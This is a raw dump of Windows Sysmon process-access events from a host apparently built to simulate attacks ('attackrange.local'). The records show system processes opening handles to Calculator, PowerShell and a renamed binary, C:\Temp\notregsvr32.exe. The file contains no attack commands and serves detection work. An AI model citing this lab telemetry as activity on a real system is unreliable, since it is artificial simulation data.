22:13:28.132{8e433fbf-2a44-6013-0e00-000000001100}71211220C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+2321e|C:\Windows\SYSTEM32\psmserviceexthost.dll+201f5|C:\Windows\SYSTEM32\psmserviceexthost.dll+1e830|C:\Windows\SYSTEM32\psmserviceexthost.dll+1d6ee|C:\Windows\SYSTEM32\psmserviceexthost.dll+264d5|C:\Windows\SYSTEM32\psmserviceexthost.dll+36ee2|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361568Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.116{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7d4e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7ca7|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+299b|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f 10341000x8000000000000000361567Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.116{8e433fbf-2a44-6013-0e00-000000001100}71211220C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+2321e|C:\Windows\SYSTEM32\psmserviceexthost.dll+201f5|C:\Windows\SYSTEM32\psmserviceexthost.dll+1e830|C:\Windows\SYSTEM32\psmserviceexthost.dll+1d6ee|C:\Windows\SYSTEM32\psmserviceexthost.dll+264d5|C:\Windows\SYSTEM32\psmserviceexthost.dll+36ee2|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361566Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.116{8e433fbf-337a-6013-7402-000000001100}62686312C:\Windows\system32\sihost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\usermgrcli.dll+112d|C:\Windows\system32\activationmanager.dll+f9dd|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e 10341000x8000000000000000361565Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.116{8e433fbf-2a44-6013-0e00-000000001100}71211220C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+33e55|C:\Windows\SYSTEM32\psmserviceexthost.dll+11fea|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361564Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.116{8e433fbf-337b-6013-8402-000000001100}16561804C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x101000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\twinapi.appcore.dll+4988e|C:\Windows\system32\twinui.pcshell.dll+4b3da|C:\Windows\system32\twinui.pcshell.dll+38af2|C:\Windows\system32\twinui.pcshell.dll+6fe9c|C:\Windows\System32\shcore.dll+b0b7|C:\Windows\system32\twinui.pcshell.dll+1dc45|C:\Windows\system32\twinui.pcshell.dll+623cb|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931 10341000x8000000000000000361563Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.116{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3433-6013-2203-000000001100}6680C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\TWINAPI.dll+6cd1|C:\Windows\system32\twinui.pcshell.dll+3b14c|C:\Windows\system32\twinui.pcshell.dll+3afee|C:\Windows\system32\twinui.pcshell.dll+3d710|C:\Windows\system32\twinui.pcshell.dll+11673|C:\Windows\system32\twinui.pcshell.dll+104e1|C:\Windows\system32\twinui.pcshell.dll+70eab|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2 10341000x8000000000000000361562Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.116{8e433fbf-337a-6013-7402-000000001100}62681424C:\Windows\system32\sihost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x101000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\activationmanager.dll+cd0b|C:\Windows\system32\activationmanager.dll+c217|C:\Windows\system32\activationmanager.dll+bd76|C:\Windows\system32\activationmanager.dll+129de|C:\Windows\system32\activationmanager.dll+25a83|C:\Windows\system32\activationmanager.dll+9593|C:\Windows\system32\activationmanager.dll+54b7|C:\Windows\system32\activationmanager.dll+4591|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8 10341000x8000000000000000361561Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.101{8e433fbf-2a44-6013-0e00-000000001100}71210564C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x3000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+222a3|C:\Windows\SYSTEM32\psmserviceexthost.dll+37ea0|C:\Windows\SYSTEM32\psmserviceexthost.dll+38b65|C:\Windows\SYSTEM32\psmserviceexthost.dll+25e9b|C:\Windows\SYSTEM32\psmserviceexthost.dll+2948a|C:\Windows\SYSTEM32\psmserviceexthost.dll+26ef6|C:\Windows\SYSTEM32\ntdll.dll+3089d|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361560Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.101{8e433fbf-2a44-6013-0e00-000000001100}71210564C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+28d18|C:\Windows\SYSTEM32\psmserviceexthost.dll+26ef6|C:\Windows\SYSTEM32\ntdll.dll+3089d|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361559Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.101{8e433fbf-2a44-6013-0e00-000000001100}71211220C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+2321e|C:\Windows\SYSTEM32\psmserviceexthost.dll+201f5|C:\Windows\SYSTEM32\psmserviceexthost.dll+1e830|C:\Windows\SYSTEM32\psmserviceexthost.dll+1d6ee|C:\Windows\SYSTEM32\psmserviceexthost.dll+264d5|C:\Windows\SYSTEM32\psmserviceexthost.dll+36ee2|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361558Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.069{8e433fbf-2a44-6013-0c00-000000001100}9804888C:\Windows\system32\lsass.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\system32\lsasrv.dll+1792a|C:\Windows\system32\lsasrv.dll+184bf|C:\Windows\system32\lsasrv.dll+17783|C:\Windows\SYSTEM32\SspiSrv.dll+1a72|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361557Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.069{8e433fbf-2a44-6013-0c00-000000001100}9804888C:\Windows\system32\lsass.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\system32\lsasrv.dll+176ae|C:\Windows\SYSTEM32\SspiSrv.dll+1a72|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361556Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.069{8e433fbf-2a44-6013-0c00-000000001100}9804888C:\Windows\system32\lsass.exe{8e433fbf-3708-6013-b503-000000001100}10452C:\Temp\notregsvr32.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\system32\lsasrv.dll+1792a|C:\Windows\system32\lsasrv.dll+184bf|C:\Windows\system32\lsasrv.dll+17783|C:\Windows\SYSTEM32\SspiSrv.dll+1a72|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361555Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.069{8e433fbf-2a44-6013-0c00-000000001100}9804888C:\Windows\system32\lsass.exe{8e433fbf-3708-6013-b503-000000001100}10452C:\Temp\notregsvr32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\system32\lsasrv.dll+176ae|C:\Windows\SYSTEM32\SspiSrv.dll+1a72|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361554Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.069{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361553Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.069{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361552Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.069{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361551Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.069{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361550Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.069{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361549Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.069{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361548Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.069{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361547Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 